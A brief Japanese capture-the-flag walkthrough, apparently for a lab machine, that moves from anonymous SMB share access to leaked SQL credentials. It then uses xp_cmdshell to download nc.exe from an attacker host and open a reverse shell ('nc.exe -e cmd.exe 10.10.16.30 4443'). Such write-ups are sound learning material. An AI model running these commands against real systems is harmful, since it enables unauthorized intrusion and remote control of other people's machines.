スキャン IP、139 と 445 ポートを見つけ、SMB であることがわかります
db_nmap -sV 10.129.243.80
smbclient -L IP
接続を試み、パスワードが空であることがわかり、共有フォルダに入り、ファイルを見つけました
get prod.dtsConfig
ローカルにダウンロード
cat prod.dtsConfig
ID とパスワードが含まれていることがわかりました
impacket-mssqlclient sql_svc@ip -windows-auth
Kali に付属の msql クライアントで IP に接続し、パスワードが空であることを確認します
xp_cmdshell "whoami"
コマンドを出力できるかを試してみます
xp_cmdshell "nc"
nc を使用できるかをテストします。もし使用できれば、シェルをバウンドさせることができます。
結果はありません
ローカルに nc.exe をダウンロードして準備します。
SQL > に入力:
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.16.30/nc.exe -outfile nc.exe"
ダウンロード完了後、nc lvnp 4443 で 4443 ポートをリッスン
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc.exe -e cmd.exe 10.10.16.30 4443"
このパスで nc.exe を実行し、この IP のこのポートにリクエストし、シェルを取得します
ターゲットシステム:Windows
dir: 現在のディレクトリのすべてのファイルをリストアップ
cd .. 上のディレクトリに戻る
type: user.txt ファイルの内容を表示
最後に Desktop で user.txt を見つけ、開いてフラグを取得します
=================================================================
C:\Users\sql_svc\Desktop>type user.txttype user.txt
